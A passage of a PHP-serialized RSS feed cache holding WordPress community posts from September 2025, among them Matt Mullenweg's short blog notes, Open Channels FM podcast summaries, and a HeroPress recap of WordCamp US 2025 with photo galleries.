/>\n</section>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 06 Sep 2025 04:23:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: Happy Birthday Anil\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149659\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://ma.tt/2025/09/anil-50/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1031:\"<p>If my calendar is correct, one of the OG bloggers <a href=\"https://www.anildash.com/\">Anil Dash</a> is turning 50 today! His blog, which I <span style=\"margin: 0px; padding: 0px;\">believe has been active since 1999, inspired me with how he</span> effortlessly transitioned between his top-tier fandom of Prince and his thoughtful commentary on the nuances and second-order effects of what we were doing with blogging, micro-blogging, web standards, interoperability, and much more. His writing is incisive and insightful. I see a core flame of empowering independents throughout his career that very much aligns with the philosophies I aspire to. Please follow him if you don&#8217;t already, and <strong>happy birthday Anil</strong>! It appears that I have linked to him 15 times on my blog before this post, and he has commented 17+ times, the first in 2005, so we have some history! Since I started drafting this he <a href=\"https://dashes.com/2025/09/05/five-for-fifty/\">published his Five for Fifty birthday post</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 05 Sep 2025 18:46:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"Open Channels FM: Expanding WordPress Capabilities with Angie and the Power of Multi-Agentic AI\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109343\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"https://openchannels.fm/expanding-wordpress-capabilities-with-angie-and-the-power-of-multi-agentic-ai/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:339:\"In this episode of the Dev Pulse, Expand the Stack series, host Zach Stepek broadcasts straight from the show floor at WordCamp US 2025, where he dives into the latest innovations shaking up the WordPress community. Zach catches up with Shilo Eish Yemini and Miriam Schwab from the Elementor team in their unmistakably pink booth [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 05 Sep 2025 08:22:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Matt: Simon Says\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149349\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://ma.tt/2025/09/simon-says/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:237:\"<p>Simon Willison <a href=\"https://simonwillison.net/2025/Sep/4/highlighted-tools/\">has vibe-coded 124 useful tools</a>. Also check out <a href=\"https://simonwillison.net/2025/Aug/9/bay-area-ai/\">his Lethal Trifecta presentation</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 05 Sep 2025 01:31:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"Open Channels FM: Bridging WordPress and the Cloud Industry at CloudFest USA in Miami\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108596\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"https://openchannels.fm/bridging-wordpress-and-the-cloud-industry-at-cloudfest-usa-in-miami/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:212:\"In this episode, Adam Weeks and Jonathan Wold discuss CloudFest USA, connecting WordPress and cloud industries. Wold highlights networking opportunities, his upcoming chat with Mary Hubbard, and event uniqueness.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2025 13:15:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"Open Channels FM: The Power of Teaching as a Beginner: How Fresh Learners Make Great Instructors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=105423\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"https://openchannels.fm/the-power-of-teaching-as-a-beginner-how-fresh-learners-make-great-instructors/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:324:\"When we picture great teachers, many of us imagine experts with decades of experience. But what if some of the most impactful educators are those who just learned the ropes themselves? In a recent episode of Open Channels FM, guest Nyasha Green and host Carl Alexander dove deep into this idea and what they shared [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Sep 2025 10:28:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Matt: God &amp;amp; Devil Debate HI\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149303\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://ma.tt/2025/09/en-passant/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1358:\"<p>There are many levels to the <a href=\"https://www.astralcodexten.com/p/what-is-man-that-thou-art-mindful\">excellent Scott Alexander satire of God, Iblis (Islamic word for devil), and Dwarkesh Patel, one of the best new podcasters of this era</a>.</p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>There are people who have gone their whole lives without realizing that Twinkle Twinkle Little Star, Baa Baa Black Sheep, and the ABC Song are all the same tune [&#8230;]</p>\n\n\n\n<p>If they’re used to stories about surgeons getting completed with the string “man”, then that’s the direction their thoughts will always go… Also, how come God can’t make humans speak normally? Everything they say is full of these um dashes!</p>\n</blockquote>\n\n\n\n<p>Which leads to a hat tip to <a href=\"https://briangardner.com/\">Brian Gardner</a> on the incredible <a href=\"https://www.mcsweeneys.net/articles/the-em-dash-responds-to-the-ai-allegations\">McSweeney&#8217;s Em dash responding to the the AI allegations</a>.</p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>So next time you read something and think, “AI wrote this—it has a lot of em dashes,” ask yourself: Is it AI? Or is it just a poet trying to give you vertigo in four lines or fewer?<br /></p>\n</blockquote>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Sep 2025 23:04:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:17:\"\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"HeroPress: HeroPress at WordCamp US 2025!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://heropress.com/?p=8186\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:125:\"https://heropress.com/heropress-at-wordcamp-us-2025/#utm_source=rss&utm_medium=rss&utm_campaign=heropress-at-wordcamp-us-2025\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10885:\"<img alt=\"A stage with giant letters spelling #WCUS on it.\" class=\"attachment-large size-large wp-post-image\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2025/09/IMG_6810.webp\" width=\"1024\" /><p>I wasn&#8217;t sure I was going to make it to WordCamp US this year, but at almost the last minute, <a href=\"https://wordpress.com\">WordPress.com</a> helped me out with travel and accommodations! <a href=\"https://heropress.com/feed/#support\">More on that below</a>.</p>\n\n\n\n<h1 class=\"kt-adv-heading8186_232186-5e wp-block-kadence-advancedheading\">Contributor Day</h1>\n\n\n\n<p>The first day was contributor day and I was a table lead. I think we had more people this year than any other year before. I started the day showing 4 or 5 people how to become contributors, and they each uploaded 20 photos or so.  All told we moderated about 160 photos during the day, and pushed the total over 26,000. I also made some great new friends!</p>\n\n\n\n<h2 class=\"kt-adv-heading8186_fc24a0-77 wp-block-kadence-advancedheading\">Photography</h2>\n\n\n\n<p>For the first time ever I was on the WordCamp Photography team. I feel like it&#8217;s a great honor because don&#8217;t really think of myself as a photographer, and I don&#8217;t even own a &#8220;real&#8221; camera, I just use my iPhone.  I do have some lenses from Moment.io which are cool, but they&#8217;re not a patch on some of the big crazy lenses I saw around.  I took several hundred pictures over the week, here are just a few:</p>\n\n\n\n<div class=\"wp-block-jetpack-tiled-gallery aligncenter is-style-rectangular\"><div class=\"\"><div class=\"tiled-gallery__gallery\"><div class=\"tiled-gallery__row\"><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6793-1024x576.webp?ssl=1\" /></figure></div><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6784-1024x433.webp?ssl=1\" /></figure></div></div><div class=\"tiled-gallery__row\"><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6794-1024x576.webp?ssl=1\" /></figure></div><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6825-1024x433.webp?ssl=1\" /></figure></div></div><div class=\"tiled-gallery__row\"><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6884-1024x576.webp?ssl=1\" /></figure></div><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6887-1024x576.webp?ssl=1\" /></figure></div></div><div class=\"tiled-gallery__row\"><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_6947-1024x433.webp?ssl=1\" /></figure></div></div><div class=\"tiled-gallery__row\"><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_7013-1024x576.webp?ssl=1\" /></figure><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_7015-1024x576.webp?ssl=1\" /></figure><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_7016-1024x576.webp?ssl=1\" /></figure></div><div class=\"tiled-gallery__col\"><figure class=\"tiled-gallery__item\"><img alt=\"\" src=\"https://i0.wp.com/heropress.com/wp-content/uploads/3025/09/IMG_7057-576x1024.webp?ssl=1\" /></figure></div></div></div></div></div>\n\n\n\n<p></p>\n\n\n\n<h2 class=\"kt-adv-heading8186_e06675-2d wp-block-kadence-advancedheading\">The Mural</h2>\n\n\n\n<p>In addition to the regular photos, I got a series of <a href=\"https://www.jaxko.com/\">Jax Ko</a> making a WordCamp mural. They painted for 2 straight days, and I took a photo about every 2 hours.  Here&#8217;s the progression in slideshow format:</p>\n\n\n\n<div class=\"wp-block-jetpack-slideshow aligncenter\"><div class=\"wp-block-jetpack-slideshow_container swiper\"><ul class=\"wp-block-jetpack-slideshow_swiper-wrapper swiper-wrapper\"><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8223\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_6997-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8224\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_6998-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8225\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7007-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8226\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7008-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8227\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7028-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8228\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7053-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8229\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7099-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8230\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7113-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8231\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7116-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8232\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7123-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8233\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7136-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8234\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7158-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8235\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7181-1024x576.webp\" width=\"1024\" /></figure></li><li class=\"wp-block-jetpack-slideshow_slide swiper-slide\"><figure><img alt=\"\" class=\"wp-block-jetpack-slideshow_image wp-image-8236\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7207-1024x576.webp\" width=\"1024\" /></figure></li></ul><a class=\"wp-block-jetpack-slideshow_button-prev swiper-button-prev swiper-button-white\"></a><a class=\"wp-block-jetpack-slideshow_button-next swiper-button-next swiper-button-white\"></a><a class=\"wp-block-jetpack-slideshow_button-pause\"></a><div class=\"wp-block-jetpack-slideshow_pagination swiper-pagination swiper-pagination-white\"></div></div></div>\n\n\n\n<h2 class=\"kt-adv-heading8186_977d34-52 wp-block-kadence-advancedheading\" id=\"support\">How I Got There</h2>\n\n\n\n<figure class=\"wp-block-kadence-image kb-image8186_46dcfe-55 size-large\"><img alt=\"\" class=\"kb-img wp-image-8202\" height=\"576\" src=\"https://heropress.com/wp-content/uploads/3025/09/IMG_7190-1024x576.webp\" width=\"1024\" /></figure>\n\n\n\n<p>As I mentioned at the top, WordPress.com was my sponsor to get to WordCamp US this year. I really wanted to attend, I&#8217;ve never missed one! They very generously offered to help me get there and cover my hotel. More than that though, folks from .com at WordCamp sought me out and told me how glad they were that I was there.  It was a very welcoming gesture.</p>\n\n\n\n<p>If you haven&#8217;t looked at WordPress.com for hosting in a while, you should check it out. There have been some substantial changes in the last few years, there are some great new features.</p>\n\n\n\n<div class=\"wp-block-kadence-image kb-image8186_9641eb-32\"><figure class=\"alignright size-large\"><a class=\"kb-advanced-image-link\" href=\"https://developer.wordpress.com/studio/\"><img alt=\"WordPress.com Studio\" class=\"kb-img wp-image-8243\" height=\"649\" src=\"https://heropress.com/wp-content/uploads/3025/09/wp_studio-1024x649.webp\" width=\"1024\" /></a></figure></div>\n\n\n\n<p>While many people may have thought of <a href=\"http://wordpress.com/\" rel=\"noreferrer noopener\" target=\"_blank\">WordPress.com</a> as a “free blog” platform only, <a href=\"http://wordpress.com/\" rel=\"noreferrer noopener\" target=\"_blank\">WordPress.com</a> has been a full-featured host for years. At the business and commerce plan level the plugin library is available for both free and paid plugins, which is great, and for more advanced users and developers they offer features like <a href=\"https://wordpress.com/hosting/#extensibility\">staging servers, SSH access, WP-CLI, github deployments</a>, and a <a href=\"https://developer.wordpress.com/studio/\">local development environment</a>. That local dev environment allows you to copy sites from production to local and then push back to either staging or production. This lets you to work on your site without disrupting your visitors’ experiences.</p>\n\n\n\n<p>Even if you don&#8217;t have hosting needs at the moment, you can still get involved! They have a great affiliate program, <a href=\"https://wordpress.com/affiliates/\">check it out here</a>. </p>\n<p>The post <a href=\"https://heropress.com/heropress-at-wordcamp-us-2025/\">HeroPress at WordCamp US 2025!</a> appeared first on <a href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Sep 2025 18:52:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"Open Channels FM: Open Channels FM Joins as a Media Partner for CloudFest USA\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=106125\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://openchannels.fm/open-channels-fm-joins-as-a-media-partner-for-cloudfest-usa/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:167:\"Open Channels FM partners with CloudFest USA in Miami on November 5-6, highlighting keynotes, panels, and networking opportunities for cloud and hosting professionals.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 